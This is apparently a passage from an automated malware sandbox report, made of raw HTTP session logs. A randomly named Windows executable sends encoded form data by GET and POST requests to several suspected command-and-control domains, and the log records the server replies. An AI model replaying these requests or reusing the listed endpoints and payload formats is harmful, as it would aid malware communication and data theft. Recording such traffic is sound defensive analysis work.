                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 59 48 7a 56 4f 4d 7a 66 46 7a 38 6c 6a 7a 73 35 51 62 52 64 51 4d 65 30 50 4d 4d 68 61 45 32 45 68 78 66 44 6e 51 5a 30 46 42 46 51 7a 6f 42 49 35 47 6b 5a 56 4e 69 47 64 78 36 34 57 6f 6d 43 72 32 6e 2b 50 2b 76 44 6e 31 76 73 52 52 56 5a 76 4b 6c 4a 50 2b 62 2f 52 37 4d 74 71 6d 31 71 43 56 4b 78 6c 43 7a 42 75 74 55 67 39 64 59 6e 48 67 49 55 7a 54 44 59 58 4a 63 52 2b 5a 35 53 34 58 53 4e 56 73 42 2b 72 42 2f 43 4a 6f 7a 6f 6c 57 30 74 6c 6f 54 79 32 54 58 77 64 64 35 35 36 45 56 2b 6c 43 44 4b 46 47 43 67 43 70 54 6f 41 56 76 62 39 71 4b 46 66 7a 54 6c 72 70 4f 36 34 57 44 31 65 4f 48 32 68 51 51 39 37 30 71 32 6b 64 57 57 47 75 45 42 36 69 73 32 36 54 52 49 6a 59 7a 34 43 56 44 30 35 4b 49 2f 37 6f 77 50 79 2b 64 67 47 62 50 44 4a 61 61 54 72 57 44 49 75 33 45 34 49 7a 33 71 42 58 79 68 30 34 64 57 57 4c 77 48 4d 73 4b 58 42 62 37 6a 78 56 33 2b 39 43 [TRUNCATED]
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993YHzVOMzfFz8ljzs5QbRdQMe0PMMhaE2EhxfDnQZ0FBFQzoBI5GkZVNiGdx64WomCr2n+P+vDn1vsRRVZvKlJP+b/R7Mtqm1qCVKxlCzButUg9dYnHgIUzTDYXJcR+Z5S4XSNVsB+rB/CJozolW0tloTy2TXwdd556EV+lCDKFGCgCpToAVvb9qKFfzTlrpO64WD1eOH2hQQ970q2kdWWGuEB6is26TRIjYz4CVD05KI/7owPy+dgGbPDJaaTrWDIu3E4Iz3qBXyh04dWWLwHMsKXBb7jxV3+9C7tN6eWZVR4X57giDHJQl5UckydtBgQyohb+U0OEvIZKiEoDD2O9/NMrUl2MorL1qUpiHeAP0Wl0svpnfuyuG0yfLix3tKvRIgMpTOtY1kbDWcQTrMnXZSX6FojBM1E1HY7yE87Z3eqnFzby38VPOXi1ogGXqG3OLPmld3CRDcEdCSovA0ne36+61O+kouTvnEUpt8R+FmnB3FsUohJav/+hgIM6UJW5zdX01dy1685HySvd1nt2cavnjAGxL69pTr37+YOnNYXU8EjIGudq53aO8Z8VX096l6xW7HPRZ7EhYu+E/NFHriX+mzCN1wiW/OJh2Bgv43DOgalxrJT+9E4IJQ7MdA+gDgNKLo7ogvJP2kgDedwYEkmmjQYvMmISKtLjHMPeQHKOucKJLouONPKTi7sMZmmHHF/C1A/Zo+ZCydbA4cLKBh1EL+/SGqXYEmQaO/VMH11VKC4HvU0lLggLcMLmaEt0WM2ITCPgd28QOVp0pZbqQUzTL7vI1GH17R+diiVPDv7a/FMckVL//2AfPfzH94wRDkl36UOyTjXFTB3vXIYiQSuP1LMwrBKIWyLlDePv75P8IKSPy4+NWW/vK8m5+N2NuYpfk446wmS6ar9+T5JRRmfVT2oxkhUCE3xOynk2w3wZ/352XiD9ZHNQqld5vPwY5y1 [TRUNCATED]
                                                                Sep 22, 2024 17:41:25.711596012 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:25 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.64972381.2.196.19804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:27.609587908 CEST421OUTGET /kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.kovallo.cloud
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:41:28.289849043 CEST691INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 548
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.64972585.159.66.93804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:33.441397905 CEST707OUTPOST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 42 7a 34 30 55 47 37 53 41 4f 6b 4b 69 4c 78 34 34 36 31 61 4e 71 36 64 6a 62 5a 2b 46 4b 4b 58 57 6e 44 43 4e 6d 46 76 52 63 4d 2b 37 72 50 78 67 51 42 47 48 34 78 58 76 46 33 75 2b 37 2b 33 45 61 55 6b 78 4e 53 49 75 2b 74 6b 69 58 32 4e 4a 64 78 57 76 79 69 72 55 39 45 6e 51 44 53 4e 72 36 47 59 43 45 6d 42 62 47 4f 66 78 4c 4c 45 30 43 39 68 38 44 59 52 65 65 33 68 73 51 39 6c 4a 41 7a 53 77 45 30 4f 68 34 71 5a 38 46 41 45 58 55 46 7a 49 75 4d 6a 68 32 30 2b 46 76 5a 65 2f 39 69 42 62 6c 66 64 37 58 64 6e 6b 6c 55 6c 79 59 70 6e 57 52 33 42 39 39 6d 63 53 41 63 6a
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pBz40UG7SAOkKiLx4461aNq6djbZ+FKKXWnDCNmFvRcM+7rPxgQBGH4xXvF3u+7+3EaUkxNSIu+tkiX2NJdxWvyirU9EnQDSNr6GYCEmBbGOfxLLE0C9h8DYRee3hsQ9lJAzSwE0Oh4qZ8FAEXUFzIuMjh20+FvZe/9iBblfd7XdnklUlyYpnWR3B99mcSAcj


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.64972685.159.66.93804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:35.986820936 CEST731OUTPOST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 41 54 49 30 48 31 44 53 43 75 6b 46 74 72 78 34 7a 61 30 54 4e 71 6d 64 6a 61 74 51 46 66 61 58 59 6a 48 43 4d 6b 74 76 53 63 4d 2b 7a 4c 50 30 6b 51 42 33 48 34 38 71 76 48 6a 75 2b 37 61 33 45 59 4d 6b 78 38 53 4c 75 75 74 71 70 33 32 54 4e 64 78 57 76 79 69 72 55 39 42 76 51 44 4b 4e 72 70 65 59 54 51 36 47 57 6d 4f 63 32 4c 4c 45 77 43 39 74 38 44 59 33 65 61 76 4c 73 53 46 6c 4a 42 44 53 78 52 41 4a 36 6f 71 44 78 6c 42 33 47 31 45 2b 4f 64 68 30 6d 46 51 37 51 6f 68 72 7a 72 6a 62 48 57 66 2b 70 48 39 6c 6b 6e 4d 58 79 34 70 4e 55 52 50 42 76 71 71 37 64 30 35 41 6e 32 36 6a 71 63 77 36 36 37 31 6a 6a 66 4c 71 32 74 4e 59 61 77 3d 3d
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pATI0H1DSCukFtrx4za0TNqmdjatQFfaXYjHCMktvScM+zLP0kQB3H48qvHju+7a3EYMkx8SLuutqp32TNdxWvyirU9BvQDKNrpeYTQ6GWmOc2LLEwC9t8DY3eavLsSFlJBDSxRAJ6oqDxlB3G1E+Odh0mFQ7QohrzrjbHWf+pH9lknMXy4pNURPBvqq7d05An26jqcw6671jjfLq2tNYaw==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.64972885.159.66.93804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:38.537328005 CEST1744OUTPOST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 41 54 49 30 48 31 44 53 43 75 6b 46 74 72 78 34 7a 61 30 54 4e 71 6d 64 6a 61 74 51 46 66 53 58 59 51 50 43 4e 46 74 76 54 63 4d 2b 39 72 50 31 6b 51 42 71 48 38 5a 68 76 48 2f 55 2b 35 53 33 46 37 45 6b 7a 4f 36 4c 67 75 74 71 6d 58 32 4f 4a 64 77 65 76 32 47 76 55 38 78 76 51 44 4b 4e 72 6f 75 59 54 45 6d 47 46 32 4f 66 78 4c 4c 59 30 43 39 42 38 43 39 43 65 61 6a 78 73 6a 6c 6c 51 69 72 53 7a 6a 6f 4a 6e 34 71 46 2f 46 42 76 47 77 64 2b 4f 64 39 34 6d 45 30 64 51 76 52 72 78 2f 61 79 55 48 72 6b 31 32 73 47 32 56 46 38 39 59 39 59 53 78 33 39 6b 49 76 4e 51 6b 41 70 72 41 4f 48 75 64 70 4b 30 4b 78 35 6f 49 43 70 32 76 73 38 4b 47 57 77 56 33 32 39 2f 64 47 73 53 41 33 63 2f 42 54 2b 4a 70 46 6f 68 4c 45 6a 46 56 4f 77 61 6f 68 6c 36 79 6c 70 37 31 49 6c 64 55 66 6c 6a 50 62 7a 2b 56 51 70 4e 6d 4e 56 4e 63 45 76 62 64 43 30 62 2b 56 4d 7a 6a 49 4d 50 6b 44 4f 58 57 79 46 36 64 41 67 58 62 62 4b 45 64 65 67 4a 5a 52 64 6d 34 5a 7a 37 57 6c [TRUNCATED]
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pATI0H1DSCukFtrx4za0TNqmdjatQFfSXYQPCNFtvTcM+9rP1kQBqH8ZhvH/U+5S3F7EkzO6LgutqmX2OJdwev2GvU8xvQDKNrouYTEmGF2OfxLLY0C9B8C9CeajxsjllQirSzjoJn4qF/FBvGwd+Od94mE0dQvRrx/ayUHrk12sG2VF89Y9YSx39kIvNQkAprAOHudpK0Kx5oICp2vs8KGWwV329/dGsSA3c/BT+JpFohLEjFVOwaohl6ylp71IldUfljPbz+VQpNmNVNcEvbdC0b+VMzjIMPkDOXWyF6dAgXbbKEdegJZRdm4Zz7Wl/WBtLzpnHr93WAgv1e/ufG8MWvd/CurLtXQdzgDXnnq3ypcmuWeud414pid0jJuh+LErlKbGJeT5PbCWxOnSvAZtMCHYzPyXY3WU+N83y2CPvbxfCCxMweGOalSpDY+S5nP0J51ViSw4x/n4fFFSZrhu8rrYR21Q8jm+xVwCBYWfM/BbYxUt51IaCFxEYztP+ZT1pNDDFocNhmLeBndtf2mE6Yb65VPp+5vbF4Sx+TaoBwVEn6RUaoSFO/uD92+R2llIeqMCrR8HeFhGpnXFOJUSv/PfHGpkbUAFbxm2oUul80hBHeC/QYPFBkJU7+i/6B8JIu0EljNP81ujpGmqtJPopHudMR0sm8YBGdGkCnJ816qZoHRfJmwFcYZ25Wy1DWocnD9jKo/ofvgPyDVvcTASV1yNmfWLinyCEbfjq9wh+XEO+V2BY1gmOGB7zpu63NY8Q1bjRcXNMBIKCf+JmGmeeAWKN1sPFvCpasKxrQxcFheeEjt8bNafyZQz2fzYoqN9B0kXP6FH/hmZjDMZvg/fiPz/JsgLfSPe321sclxBwtYvkFuZt3XRPQ1SewUZqc1WjTs5RfYTuuvRuoegHX1X3mlVhIke9hopq6eVKeDh2WxdyYN7uoZ2n/0+EFbyTVDJ+QBFUHuq0hrYMjR9sWotH7NEaGXRP+ [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.64972985.159.66.93804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:41.252269030 CEST428OUTGET /becc/?azq=fdKL&i4fTbV=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1rIFAvnCnNucMsmrQXs06QWDt4JmjDj2SCXWkqqyO9GVL4EIVQqM= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.sppsuperplast.online
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:41:41.844948053 CEST225INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.14.1
                                                                Date: Sun, 22 Sep 2024 15:41:41 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                X-Rate-Limit-Limit: 5s
                                                                X-Rate-Limit-Remaining: 19
                                                                X-Rate-Limit-Reset: 2024-09-22T15:41:46.7226135Z


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.6497303.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:47.003547907 CEST677OUTPOST /fl4z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.tracy.club
                                                                Origin: http://www.tracy.club
                                                                Referer: http://www.tracy.club/fl4z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 75 50 66 71 6e 39 55 42 49 2b 7a 7a 65 70 5a 47 67 62 4c 59 6e 35 61 47 31 74 46 43 49 73 57 73 75 7a 37 67 77 61 41 4c 49 2f 6b 4d 66 35 6e 78 69 35 73 6a 78 4c 74 30 54 4a 53 49 32 6f 31 76 36 4d 51 46 58 6c 57 78 4a 55 65 34 5a 4b 67 61 4b 4a 30 6a 63 71 34 70 77 71 62 5a 50 65 4a 79 54 73 4c 4b 44 35 76 4c 66 69 75 64 55 47 63 44 47 66 45 4a 62 71 71 4e 45 41 68 58 46 38 69 76 53 62 6b 59 48 37 53 37 4c 56 31 4b 4a 52 5a 74 41 33 6d 33 30 45 75 67 54 76 48 78 2b 67 6a 73 2b 36 42 49 42 51 53 53 76 73 71 6c 78 50 5a 75 6e 4d 32 34 72 63 76 54 6a 47 59 57 58 50 4b 6d 70 55 6e 63 44 68 67 6a 76 56 46 45
                                                                Data Ascii: i4fTbV=uPfqn9UBI+zzepZGgbLYn5aG1tFCIsWsuz7gwaALI/kMf5nxi5sjxLt0TJSI2o1v6MQFXlWxJUe4ZKgaKJ0jcq4pwqbZPeJyTsLKD5vLfiudUGcDGfEJbqqNEAhXF8ivSbkYH7S7LV1KJRZtA3m30EugTvHx+gjs+6BIBQSSvsqlxPZunM24rcvTjGYWXPKmpUncDhgjvVFE


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.6497313.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:49.552201033 CEST701OUTPOST /fl4z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.tracy.club
                                                                Origin: http://www.tracy.club
                                                                Referer: http://www.tracy.club/fl4z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 75 50 66 71 6e 39 55 42 49 2b 7a 7a 65 4a 70 47 69 36 4c 59 32 70 61 48 72 39 46 43 65 63 57 6f 75 7a 33 67 77 65 78 4f 50 4e 41 4d 66 5a 33 78 77 34 73 6a 79 4c 74 30 4c 35 53 4e 79 6f 31 30 36 4d 55 6e 58 6c 36 78 4a 55 4b 34 5a 4c 51 61 4a 2b 41 73 64 36 34 72 39 4b 62 58 4d 75 4a 79 54 73 4c 4b 44 36 54 74 66 6b 47 64 55 58 73 44 48 37 59 4f 45 61 71 4f 54 77 68 58 58 4d 69 72 53 62 6b 32 48 36 66 57 4c 58 39 4b 4a 51 46 74 41 6d 6d 32 39 45 75 6d 64 50 47 61 31 69 65 44 34 49 55 66 43 42 75 51 76 76 79 74 30 35 59 30 37 2f 32 62 35 4d 50 52 6a 45 41 6b 58 76 4b 4d 72 55 66 63 52 32 73 45 67 68 67 6e 6d 72 35 53 51 52 59 76 68 48 77 6c 7a 31 70 54 47 51 47 59 6e 67 3d 3d
                                                                Data Ascii: i4fTbV=uPfqn9UBI+zzeJpGi6LY2paHr9FCecWouz3gwexOPNAMfZ3xw4sjyLt0L5SNyo106MUnXl6xJUK4ZLQaJ+Asd64r9KbXMuJyTsLKD6TtfkGdUXsDH7YOEaqOTwhXXMirSbk2H6fWLX9KJQFtAmm29EumdPGa1ieD4IUfCBuQvvyt05Y07/2b5MPRjEAkXvKMrUfcR2sEghgnmr5SQRYvhHwlz1pTGQGYng==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.6497323.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:52.532500982 CEST1714OUTPOST /fl4z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.tracy.club
                                                                Origin: http://www.tracy.club
                                                                Referer: http://www.tracy.club/fl4z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 75 50 66 71 6e 39 55 42 49 2b 7a 7a 65 4a 70 47 69 36 4c 59 32 70 61 48 72 39 46 43 65 63 57 6f 75 7a 33 67 77 65 78 4f 50 4e 49 4d 66 76 37 78 69 62 55 6a 7a 4c 74 30 56 4a 53 4d 79 6f 30 75 36 4d 73 6a 58 6c 6e 47 4a 57 79 34 5a 70 6f 61 43 73 6f 73 55 36 34 72 30 71 62 57 50 65 4a 6e 54 73 62 57 44 35 37 74 66 6b 47 64 55 55 30 44 41 76 45 4f 66 61 71 4e 45 41 68 54 46 38 69 54 53 62 73 41 48 36 4b 72 4c 6d 64 4b 4a 77 56 74 4d 30 4f 32 79 45 75 6b 61 50 47 43 31 69 53 63 34 49 59 54 43 42 4c 31 76 74 75 74 32 4e 56 79 67 37 43 46 72 4d 75 39 39 57 45 52 58 36 53 38 6e 56 66 36 58 6d 63 72 75 6c 6b 61 74 4e 74 55 62 44 42 73 67 6b 78 4d 73 54 55 61 4b 79 62 66 38 7a 72 50 64 51 62 39 4e 61 72 41 57 57 47 78 52 4e 69 41 77 38 56 78 78 37 43 6c 6e 49 68 59 6f 73 52 78 55 63 58 6d 73 35 64 67 6f 32 7a 78 41 56 2b 46 38 38 48 79 37 49 4a 72 52 77 56 51 31 53 63 43 77 61 52 4e 74 57 35 55 48 63 55 63 34 39 45 39 52 69 56 67 74 50 6a 57 69 33 75 62 6f 4d 49 74 55 2f 2b 33 49 38 33 [TRUNCATED]
                                                                Data Ascii: i4fTbV=uPfqn9UBI+zzeJpGi6LY2paHr9FCecWouz3gwexOPNIMfv7xibUjzLt0VJSMyo0u6MsjXlnGJWy4ZpoaCsosU64r0qbWPeJnTsbWD57tfkGdUU0DAvEOfaqNEAhTF8iTSbsAH6KrLmdKJwVtM0O2yEukaPGC1iSc4IYTCBL1vtut2NVyg7CFrMu99WERX6S8nVf6XmcrulkatNtUbDBsgkxMsTUaKybf8zrPdQb9NarAWWGxRNiAw8Vxx7ClnIhYosRxUcXms5dgo2zxAV+F88Hy7IJrRwVQ1ScCwaRNtW5UHcUc49E9RiVgtPjWi3uboMItU/+3I83Vaw+eIkgoY5R1oQ+OArUv/SeyPlvYSRkT2dcuQ5kT0wzdLjJfbOrqdiJr7hJiqmfmZgHf/MNAJFnhEep6cInX/Xdad8kVUaR7U+Cb3+uYn6AY1RTOWMN74D7E/kzPg5sFpiVWb2BfKxUzK0pBNMsvEGjFOW3cAV4qdEp3tYtDnC0OH7jRmvA8uWV1Kw054YbPN5x+Q+fz1lts8/vd7/yAAnggHFujkdOpT9vycsxgy7S/1ci1zVuIJj5US+jBopmJU+6/Fd5QVQlznPUkBklFdeCoog4vUCJWUvc7kXcXpH9HXECudMZiPhR/TsBdXDyok34gEgzDL6Renz5daLqOSKVsOlb1oIycKhH+eDGElEW5+QHxC3XrVfpIQeKtmaO+eR3FCzAJFWUBX/VK+IlquirbW07t8GiGVCCDlSh7o7H3PSfwNhQosbuhZNR+daaRNgCzAs6ENtMNNByl/lfq8hGCmo7ZuQlIz69Aluel9eRDELqc9dQStRSAX90CEgydc3Xx3YeCS/HDQQVKyq9uvFSjyzyaWmo7EmBZYG0+ImhaJg+NKjFh0Yj44AzuxgNkjKtDVG1S3OL2T99US+Ww25gL/h1OBT50Sv5kWcRIxJZ7c3BnGwitxhQF7s1HPfudysr9EHkDFOnLRa4dT5OY4VVTzkZ6B1I9v [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.6497333.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:41:55.078181028 CEST418OUTGET /fl4z/?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.tracy.club
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:41:55.528479099 CEST407INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:41:55 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
